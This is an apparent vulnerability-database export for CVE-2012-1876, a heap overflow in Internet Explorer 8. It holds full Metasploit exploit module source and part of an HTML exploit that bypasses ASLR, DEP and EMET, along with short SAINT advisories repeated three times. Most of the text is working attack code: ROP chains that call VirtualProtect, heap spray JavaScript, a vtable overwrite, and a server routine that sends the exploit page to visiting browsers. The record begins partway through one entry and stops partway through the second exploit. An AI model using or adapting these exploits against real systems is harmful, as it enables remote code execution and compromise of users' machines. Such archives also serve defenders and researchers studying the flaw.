4 bytes [MSVCR71.dll] \n0x7c34373a, # pop ebx ; retn [MSVCR71.dll] \nexec_size, # ebx \n0x7c3444d0, # pop edx ; retn [MSVCR71.dll] \n0x00000040, # 0x00000040-> edx \n0x7c361829, # pop ecx ; retn [MSVCR71.dll] \n0x7c38f036, # &Writable location [MSVCR71.dll] \n0x7c342766, # pop edi ; retn [MSVCR71.dll] \n0x7c346c0b, # retn (rop nop) [MSVCR71.dll] 
\n0x7c350564, # pop esi ; retn [MSVCR71.dll] \n0x7c3415a2, # jmp [eax] [MSVCR71.dll] \n0x7c3766ff, # pop eax ; retn [MSVCR71.dll] \n0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll] \n0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll] \n0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll] \n].pack(\"V*\") \nend \n \ncode = rop + code \nreturn code \nend \n \ndef on_request_uri(cli, request) \n \nagent = request.headers['User-Agent'] \nmy_target = get_target(agent) \n \n# Avoid the attack if the victim doesn't have the same setup we're targeting \nif my_target.nil? \nprint_error(\"Browser not supported: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \njs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch)) \n \ntable_builder = '' \n \n0.upto(132) do |i| \ntable_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >  </col></table>\" \nend \n \n# About smash_vtable(): \n# * smash the vftable 0x07070024 \n# * span => the amount to overwrite \njs_element_id = Rex::Text.rand_text_alpha(4) \nspray_trigger_js = <<-JS \n \nvar dap = \"EEEE\"; \nwhile ( dap.length < 480 ) dap += dap; \n \nvar padding = \"AAAA\"; \nwhile ( padding.length < 480 ) padding += padding; \n \nvar filler = \"BBBB\"; \nwhile ( filler.length < 480 ) filler += filler; \n \nvar arr = new Array(); \nvar rra = new Array(); \n \nvar div_container = document.getElementById(\"#{js_element_id}\"); \ndiv_container.style.cssText = \"display:none\"; \n \nfor (var i=0; i < 500; i+=2) { \nrra[i] = dap.substring(0, (0x100-6)/2); \narr[i] = padding.substring(0, (0x100-6)/2); \narr[i+1] = filler.substring(0, (0x100-6)/2); \nvar obj = document.createElement(\"button\"); \ndiv_container.appendChild(obj); \n} \n \nfor (var i=200; i<500; i+=2 ) { \nrra[i] = null; \nCollectGarbage(); \n} \n \nfunction heap_spray(){ \nCollectGarbage(); \n \nvar shellcode = unescape(\"#{js_code}\"); \n \nwhile (shellcode.length < 
100000) \nshellcode = shellcode + shellcode; \nvar onemeg = shellcode.substr(0, 64*1024/2); \nfor (i=0; i<14; i++) { \nonemeg += shellcode.substr(0, 64*1024/2); \n} \n \nonemeg += shellcode.substr(0, (64*1024/2)-(38/2)); \nvar spray = new Array(); \n \nfor (i=0; i<400; i++) { \nspray[i] = onemeg.substr(0, onemeg.length); \n} \n} \n \nfunction smash_vtable(){ \nvar obj_col_0 = document.getElementById(\"132\"); \nobj_col_0.width = \"1178993\"; \nobj_col_0.span = \"44\"; \n} \n \nsetTimeout(function(){heap_spray()}, 400); \nsetTimeout(function(){smash_vtable()}, 700); \nJS \n \nif datastore['OBFUSCATE'] \nspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js) \nspray_trigger_js.obfuscate \nend \n \n# build html \ncontent = <<-HTML \n<html> \n<body> \n<div id=\"#{js_element_id}\"></div> \n#{table_builder} \n<script language='javascript'> \n#{spray_trigger_js} \n</script> \n</body> \n</html> \nHTML \n \nprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\") \n \n# Transmit the response to the client \nsend_response_html(cli, content) \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/115155/ms12_037_ie_colspan.rb.txt"}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. 
The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2012-08-06T00:00:00", "published": "2012-08-06T00:00:00", "id": "SAINT:E0DB2F32D06502F92B8144DCC51213D4", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "title": "Internet Explorer COL SPAN Heap Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:28", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "edition": 2, "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. 
The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2012-08-06T00:00:00", "published": "2012-08-06T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "id": "SAINT:625E0D0980997F6BFF377B9847205303", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "description": "Added: 08/06/2012 \nCVE: [CVE-2012-1876](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1876>) \nBID: [53848](<http://www.securityfocus.com/bid/53848>) \nOSVDB: [82866](<http://www.osvdb.org/82866>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nInternet Explorer allows websites to utilize Javascript to create dynamic web content. As such, websites can include scripts that modify the website at run-time. 
The browser needs to manage the modifications of objects that are altered at run-time. Internet Explorer does not properly handle memory allocations when a modification to the SPAN attribute of table COL field is made, where the table table-layout style is set to 'fixed'. This can result in an exploitable heap overflow condition. \n\n### Resolution\n\nApply the patch referenced in [Microsoft Security Bulletin 12-037](<http://www.microsoft.com/technet/security/Bulletin/MS12-037.mspx>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-093/> \n<http://www.microsoft.com/technet/security/bulletin/MS12-037.mspx> \n<http://support.microsoft.com/default.aspx?scid=kb;EN-US;2699988> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8 with KB2675157 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2012-08-06T00:00:00", "published": "2012-08-06T00:00:00", "id": "SAINT:26F60ECC90154B838B0AF4C895DDCD0E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_col_span_heap_overflow", "type": "saint", "title": "Internet Explorer COL SPAN Heap Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T13:38:25", "description": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow. CVE-2012-1876. Remote exploit for windows platform", "published": "2012-08-02T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2012-08-02T00:00:00", "id": "EDB-ID:20174", "href": "https://www.exploit-db.com/exploits/20174/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:ua_minver => \"8.0\",\r\n\t\t:ua_maxver => \"8.0\",\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:javascript => true\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a heap overflow vulnerability in Internet Explorer caused\r\n\t\t\t\tby an incorrect handling of the span attribute for col elements from a fixed table,\r\n\t\t\t\twhen they are modified dynamically by javascript code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Alexandre Pelletier', # Vulnerability analysis\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\r\n\t\t\t\t\t'binjo', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Help with the Metasploit module\r\n\t\t\t\t\t'juan' # Help with the Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-1876' ],\r\n\t\t\t\t\t[ 'OSVDB', '82866'],\r\n\t\t\t\t\t[ 'BID', '53848' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-037' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 
'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3 with msvcrt ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'IE 8 on Windows 7 SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :jre\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Jun 12 2012',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef get_target(agent)\r\n\t\t#If the user is already specified by the user, we'll just use that\r\n\t\treturn target if target.name != 'Automatic'\r\n\r\n\t\tif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[1] #IE 8 on Windows XP SP3\r\n\t\telsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8/\r\n\t\t\treturn targets[2] #IE 8 on Windows 7 with JRE\r\n\t\telse\r\n\t\t\treturn nil\r\n\t\tend\r\n\tend\r\n\r\n\tdef junk(n=4)\r\n\t\treturn rand_text_alpha(n).unpack(\"V\").first\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"V\").first\r\n\tend\r\n\r\n\tdef get_payload(t)\r\n\r\n\t\tcode = payload.encoded\r\n\r\n\t\t# Both ROP chains generated by mona.py - See corelan.be\r\n\t\tcase t['Rop']\r\n\t\t\twhen :msvcrt\r\n\t\t\t\tprint_status(\"Using msvcrt ROP\")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x77c4ec01, # retn\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c15ed5, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\t0x77c11120, # <- *&VirtualProtect()\r\n\t\t\t\t\t\t0x77c2e493, # mov eax, dword ptr ds:[eax]; pop ebp; retn\r\n\t\t\t\t\t\tjunk,\r\n\t\t\t\t\t\t0x77c2dd6c,\r\n\t\t\t\t\t\t0x77c4ec00, # pop ebp; retn\r\n\t\t\t\t\t\t0x77c35459, # ptr to 'push esp; ret'\r\n\t\t\t\t\t\t0x77c47705, # pop ebx; 
retn\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x77c3ea01, # pop ecx; retn\r\n\t\t\t\t\t\t0x77c5d000, # W pointer (lpOldProtect) (-> ecx)\r\n\t\t\t\t\t\t0x77c46100, # pop edi; retn\r\n\t\t\t\t\t\t0x77c46101, # rop nop (-> edi)\r\n\t\t\t\t\t\t0x77c4d680, # pop edx; retn\r\n\t\t\t\t\t\t0x00000040, # newProtect (0x40) (-> edx)\r\n\t\t\t\t\t\t0x77c4e392, # pop eax; retn\r\n\t\t\t\t\t\tnop, # nops (-> eax)\r\n\t\t\t\t\t\t0x77c12df9 # pushad; retn\r\n\t\t\t\t\t].pack(\"V*\")\r\n\t\t\twhen :jre\r\n\t\t\t\tprint_status(\"Using JRE ROP\")\r\n\t\t\t\texec_size = code.length\r\n\t\t\t\trop =\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t0x7c346c0b, # retn\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn\r\n\t\t\t\t\t\t0x7c348b05, # xchg eax,esp; retn (pivot)\r\n\t\t\t\t\t\t0x7c36f970, # pop ebp; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c36f970, # skip 4 bytes [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\texec_size, # ebx\r\n\t\t\t\t\t\t0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x00000040, # 0x00000040-> edx\r\n\t\t\t\t\t\t0x7c361829, # pop ecx ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c38f036, # &Writable location [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c342766, # pop edi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c350564, # pop esi ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3415a2, # jmp [eax] [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\r\n\t\t\t\t\t\t0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\r\n\t\t\t\t\t\t0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\r\n\t\t\t\t\t].pack(\"V*\")\r\n\t\tend\r\n\r\n\t\tcode = rop + code\r\n\t\treturn code\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = request.headers['User-Agent']\r\n\t\tmy_target = get_target(agent)\r\n\r\n\t\t# Avoid the attack if the victim doesn't have the same setup we're targeting\r\n\t\tif 
my_target.nil?\r\n\t\t\tprint_error(\"Browser not supported: #{agent}\")\r\n\t\t\tsend_not_found(cli)\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tjs_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\r\n\r\n\t\ttable_builder = ''\r\n\r\n\t\t0.upto(132) do |i|\r\n\t\t\ttable_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >  </col></table>\"\r\n\t\tend\r\n\r\n\t\t# About smash_vtable():\r\n\t\t# * smash the vftable 0x07070024\r\n\t\t# * span => the amount to overwrite\r\n\t\tjs_element_id = Rex::Text.rand_text_alpha(4)\r\n\t\tspray_trigger_js = <<-JS\r\n\r\n\t\tvar dap = \"EEEE\";\r\n\t\twhile ( dap.length < 480 ) dap += dap;\r\n\r\n\t\tvar padding = \"AAAA\";\r\n\t\twhile ( padding.length < 480 ) padding += padding;\r\n\r\n\t\tvar filler = \"BBBB\";\r\n\t\twhile ( filler.length < 480 ) filler += filler;\r\n\r\n\t\tvar arr = new Array();\r\n\t\tvar rra = new Array();\r\n\r\n\t\tvar div_container = document.getElementById(\"#{js_element_id}\");\r\n\t\tdiv_container.style.cssText = \"display:none\";\r\n\r\n\t\tfor (var i=0; i < 500; i+=2) {\r\n\t\t\trra[i] = dap.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i] = padding.substring(0, (0x100-6)/2);\r\n\t\t\tarr[i+1] = filler.substring(0, (0x100-6)/2);\r\n\t\t\tvar obj = document.createElement(\"button\");\r\n\t\t\tdiv_container.appendChild(obj);\r\n\t\t}\r\n\r\n\t\tfor (var i=200; i<500; i+=2 ) {\r\n\t\t\trra[i] = null;\r\n\t\t\tCollectGarbage();\r\n\t\t}\r\n\r\n\t\tfunction heap_spray(){\r\n\t\t\tCollectGarbage();\r\n\r\n\t\t\tvar shellcode = unescape(\"#{js_code}\");\r\n\r\n\t\t\twhile (shellcode.length < 100000)\r\n\t\t\tshellcode = shellcode + shellcode;\r\n\t\t\tvar onemeg = shellcode.substr(0, 64*1024/2);\r\n\t\t\tfor (i=0; i<14; i++) {\r\n\t\t\t\tonemeg += shellcode.substr(0, 64*1024/2);\r\n\t\t\t}\r\n\r\n\t\t\tonemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n\t\t\tvar spray = new Array();\r\n\r\n\t\t\tfor (i=0; i<400; i++) 
{\r\n\t\t\t\tspray[i] = onemeg.substr(0, onemeg.length);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tfunction smash_vtable(){\r\n\t\t\tvar obj_col_0 = document.getElementById(\"132\");\r\n\t\t\tobj_col_0.width = \"1178993\";\r\n\t\t\tobj_col_0.span = \"44\";\r\n\t\t}\r\n\r\n\t\tsetTimeout(function(){heap_spray()}, 400);\r\n\t\tsetTimeout(function(){smash_vtable()}, 700);\r\n\t\tJS\r\n\r\n\t\tif datastore['OBFUSCATE']\r\n\t\t\tspray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\r\n\t\t\tspray_trigger_js.obfuscate\r\n\t\tend\r\n\r\n\t\t# build html\r\n\t\tcontent = <<-HTML\r\n\t\t<html>\r\n\t\t<body>\r\n\t\t<div id=\"#{js_element_id}\"></div>\r\n\t\t#{table_builder}\r\n\t\t<script language='javascript'>\r\n\t\t#{spray_trigger_js}\r\n\t\t</script>\r\n\t\t</body>\r\n\t\t</html>\r\n\t\tHTML\r\n\r\n\t\tprint_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20174/"}, {"lastseen": "2016-02-03T20:10:28", "description": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.x Bypass (MS12-037). CVE-2012-1876. 
Remote exploit for windows platform", "published": "2014-07-01T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.x Bypass MS12-037", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "EDB-ID:33944", "href": "https://www.exploit-db.com/exploits/33944/", "sourceData": "<!--\r\n** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 4.1.X bypass\r\n** Offensive Security Research Team\r\n** http://www.offensive-security.com/vulndev/disarming-enhanced-mitigation-experience-toolkit-emet\r\n** Affected Software: Internet Explorer 8\r\n** Vulnerability: Fixed Col Span ID\r\n** CVE: CVE-2012-1876\r\n** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 4.1.X\r\n-->\r\n\r\n<html>\r\n<body>\r\n<div id=\"evil\"></div>\r\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00c2\u00a0 </col></table>\r\n<script language='javascript'>\r\n\r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n\r\nvar free = \"EEEE\";\r\nwhile ( free.length < 500 ) free += free;\r\n\r\nvar string1 = \"AAAA\";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n\r\nvar string2 = \"BBBB\";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n\r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n\r\nvar div_container = document.getElementById(\"evil\");\r\ndiv_container.style.cssText = \"display:none\";\r\n\r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement(\"button\");\r\n div_container.appendChild(obj);\r\n}\r\n\r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n\r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = 
rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 
454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n\r\n\r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n\r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n\r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n\r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var 
getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n\r\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\r\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\r\n\r\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\r\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\r\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\r\n\r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\r\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\r\n 